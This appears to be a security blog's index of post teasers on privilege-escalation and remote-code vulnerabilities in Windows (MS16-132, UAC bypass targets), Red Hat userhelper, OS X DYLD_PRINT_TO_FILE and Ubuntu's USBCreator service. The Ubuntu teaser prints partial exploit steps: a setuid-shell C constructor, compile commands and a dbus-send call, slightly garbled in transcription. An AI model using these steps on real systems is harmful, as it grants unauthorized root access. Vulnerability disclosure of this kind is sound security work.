Microsoft Windows Animation Manager Memory Corruption Vulnerability (MS16-132) (CVE-2016-7205) + POC:

A memory corruption in the Microsoft Windows Animation Manager which allows a malicious user to remotely execute arbitrary code on a vulnerable user’s machine, in the context of the current user. JavaScript POC ::HERE::

Read More

Windows 10 RS1 14316

The build brings new changes targeting previously exploited dll-hijacking and uac bypass method vulnerabilities.

cliconfg.exe – can no longer be used as target for autoelevation as MS changed it manifest to autoelevate=false.

mmc.exe – event viewer console fixed, dll hijacking no longer works.

fake IIS inetmgr...

Read More

Red Hat userhelper vulnerability

Two security vulnerabilities were found in the userhelper utility, (part of the usermode package) and the libuser library. Authenticated, local users with shell access could combine these vulnerabilities to achieve local privilege escalation to the root user, it lets users change /etc/passwd...

Read More

Root Privs on OS X 10.10

OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability: Affects OS X Yosemite v.10.10, the latest stable release, and the beta version 10.10.5 , so many people are affected by this. The flaw is the environment variable called DYLD_PRINT_TO_FILE that was added in Yosemite...

Read More

Priv Escalation in Ubuntu USBCreator service

On Ubuntu and need to escalate to root and don’t have sudo?

$ cat test.c
void __attribute__((constructor)) init (void)
chown(“/tmp/test”, 0, 0);
chmod(“/tmp/test”, 04755);
$ gcc -shared -fPIC -o /tmp/ test.c
$ cp /bin/sh /tmp/test
$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu...

Read More